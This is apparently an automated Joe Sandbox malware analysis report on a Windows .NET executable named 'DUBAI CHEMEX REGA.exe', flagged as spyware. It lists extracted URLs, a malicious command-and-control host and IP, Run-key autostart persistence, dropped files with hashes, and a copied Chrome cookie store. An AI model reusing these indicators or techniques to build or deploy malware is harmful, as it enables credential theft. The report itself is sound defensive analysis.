                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/9DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/cTheDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://fontfabrik.comDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/5~DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/Y0oDUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/Q~)MDUBAI CHEMEX REGA.exe, 00000000.00000003.649977429.0000000006386000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/jp/5~DUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.fonts.comnDUBAI CHEMEX REGA.exe, 00000000.00000003.646602465.000000000639B000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleaseDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  https://api.ipify.org%GETMozilla/5.0AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  low
                                  http://www.fonts.comDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.sandoll.co.krDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.urwpp.deDPleaseDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/.~6MDUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.zhongyicts.com.cnDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDUBAI CHEMEX REGA.exe, 00000000.00000002.664563832.000000000339A000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741183439.00000000027DC000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.sakkal.comDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://api.ipify.org%DUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      low
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipDUBAI CHEMEX REGA.exe, 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.909153388.0000000000402000.00000040.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.fontbureau.comDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                          high
                                          http://DynDns.comDynDNSAlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comueDUBAI CHEMEX REGA.exe, 00000000.00000002.668995974.000000000638A000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.founder.com.cn/cnrig)EDUBAI CHEMEX REGA.exe, 00000000.00000003.648227085.0000000006391000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fonts.comcDUBAI CHEMEX REGA.exe, 00000000.00000003.646661565.000000000639B000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.founder.com.cn/cnLogDUBAI CHEMEX REGA.exe, 00000000.00000003.648227085.0000000006391000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://Ii19E5Eebc4fe8K8ng5D.comDUBAI CHEMEX REGA.exe, 00000004.00000002.911770163.0000000002EDC000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000004.00000003.862456569.0000000000D84000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haDUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/dd8DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/jp/DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comaDUBAI CHEMEX REGA.exe, 00000000.00000002.668995974.000000000638A000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cnDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-user.htmlDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmp, DUBAI CHEMEX REGA.exe, 00000000.00000003.649977429.0000000006386000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/nDUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://webmail.satguruclearing.comDUBAI CHEMEX REGA.exe, 00000004.00000002.911837506.0000000002EFC000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.com/designers8DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.tiro.comymDUBAI CHEMEX REGA.exe, 00000000.00000003.647546366.000000000639B000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/jp/.~6MDUBAI CHEMEX REGA.exe, 00000000.00000003.649754673.000000000638C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/e~DUBAI CHEMEX REGA.exe, 00000000.00000003.649641249.000000000638C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.91.199.135
                                                webmail.satguruclearing.comUnited States
                                                394695PUBLIC-DOMAIN-REGISTRYUStrue

                                                General Information

                                                Joe Sandbox Version:31.0.0 Emerald
                                                Analysis ID:385489
                                                Start date:12.04.2021
                                                Start time:15:29:31
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 12m 11s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:DUBAI CHEMEX REGA.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:24
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@7/5@2/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 0.4% (good quality ratio 0.3%)
                                                • Quality average: 48.9%
                                                • Quality standard deviation: 32.4%
                                                HCA Information:
                                                • Successful, ratio: 98%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.82.209.183, 131.253.33.200, 13.107.22.200, 104.43.139.144, 92.122.145.220, 104.42.151.234, 13.88.21.125, 20.50.102.62, 93.184.221.240, 52.155.217.156, 20.54.26.129, 13.64.90.137, 168.61.161.212, 92.122.213.194, 92.122.213.247
                                                • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                15:30:24API Interceptor677x Sleep call for process: DUBAI CHEMEX REGA.exe modified
                                                15:30:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AlxpSuW C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                15:30:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AlxpSuW C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                15:31:00API Interceptor505x Sleep call for process: AlxpSuW.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                208.91.199.135Dubai REGA 2021UAE.exeGet hashmaliciousBrowse
                                                  DUBAI UAEGH092021.exeGet hashmaliciousBrowse
                                                    HCU2134 SINGAPORE.docGet hashmaliciousBrowse
                                                      DUBAI PPMC HCU217ED.exeGet hashmaliciousBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        webmail.satguruclearing.comDubai REGA 2021UAE.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        DUBAI UAEGH092021.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        SecuriteInfo.com.Trojan.Siggen12.57034.10737.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        HCU2134 SINGAPORE.docGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        DUBAI PPMC HCU217ED.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        PUBLIC-DOMAIN-REGISTRYUSBILL-OOO566876.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        SecuriteInfo.com.Scr.Malcodegdn30.29716.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        commercial invoice & packing list doc.exeGet hashmaliciousBrowse
                                                        • 43.225.55.205
                                                        ORDER 9387383900.xlsxGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        Payment Advice Note from 02.04.2021 to 608761.exeGet hashmaliciousBrowse
                                                        • 208.91.199.223
                                                        Dubai REGA 2021UAE.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        e0xd7qhFaMk3Dpx.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        Dridex.xlsGet hashmaliciousBrowse
                                                        • 208.91.199.159
                                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                                        • 162.251.80.27
                                                        documents-351331057.xlsmGet hashmaliciousBrowse
                                                        • 162.251.80.27
                                                        DUBAI UAEGH092021.exeGet hashmaliciousBrowse
                                                        • 208.91.199.135
                                                        PAGO FACTURA V-8680.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                                        • 162.251.80.27
                                                        documents-1819557117.xlsmGet hashmaliciousBrowse
                                                        • 162.251.80.27
                                                        usd 420232.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        P037725600.exeGet hashmaliciousBrowse
                                                        • 208.91.199.225
                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                        • 208.91.199.224
                                                        VAT INVOICE.exeGet hashmaliciousBrowse
                                                        • 208.91.199.224
                                                        NEW ORDER.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143
                                                        TRANSFERENCIA AL EXTERIOR U810295.exeGet hashmaliciousBrowse
                                                        • 208.91.198.143

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AlxpSuW.exe.log
                                                        Process:C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DUBAI CHEMEX REGA.exe.log
                                                        Process:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                        C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe
                                                        Process:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):623104
                                                        Entropy (8bit):7.483309393560406
                                                        Encrypted:false
                                                        SSDEEP:12288:rxpH6m/fCbppI+hEUdrTcxp/mYkTTMQBLAhkDKi:7r3CPIOrV4x0YmTMQyhkmi
                                                        MD5:7A7078E03FD2FEE66B7436DA7222D2E0
                                                        SHA1:03F9DD35D1D16D69DA789E8E1E0119F0163ADAAE
                                                        SHA-256:B655965E57F392A0C5D82D2F248D432575B4F7092FA87A8BD868E56E6E32D546
                                                        SHA-512:8E6E91E97B95946F13769BAFE7BF421D2021158B33C30D4395FEE4D3A37EA3DA2DE3E4BA4429860F492A3332B2F086CB9C13D429724806C95F83BAA432D35006
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...R.s`..............P.................. ... ....@.. ....................................@.................................X...O.... ..<............................................................................ ............... ..H............text........ ...................... ..`.rsrc...<.... ......................@..@.reloc..............................@..B........................H.......................@....I...........................................0............($...(%.........(.....o&....*.....................('......((......()......(*......(+....*N..(....o....(,....*&..(-....*.s.........s/........s0........s1........s2........*....0...........~....o3....+..*.0...........~....o4....+..*.0...........~....o5....+..*.0...........~....o6....+..*.0...........~....o7....+..*.0..<........~.....(8.....,!r...p.....(9...o:...s;............~.....+..*.0......
                                                        C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\AppData\Roaming\wwcoyfzh.i55\Chrome\Default\Cookies
                                                        Process:C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:modified
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.7006690334145785
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                        MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                        SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                        SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                        SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.483309393560406
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:DUBAI CHEMEX REGA.exe
                                                        File size:623104
                                                        MD5:7a7078e03fd2fee66b7436da7222d2e0
                                                        SHA1:03f9dd35d1d16d69da789e8e1e0119f0163adaae
                                                        SHA256:b655965e57f392a0c5d82d2f248d432575b4f7092fa87a8bd868e56e6e32d546
                                                        SHA512:8e6e91e97b95946f13769bafe7bf421d2021158b33c30d4395fee4d3a37ea3da2de3e4ba4429860f492a3332b2f086cb9c13d429724806c95f83baa432d35006
                                                        SSDEEP:12288:rxpH6m/fCbppI+hEUdrTcxp/mYkTTMQBLAhkDKi:7r3CPIOrV4x0YmTMQyhkmi
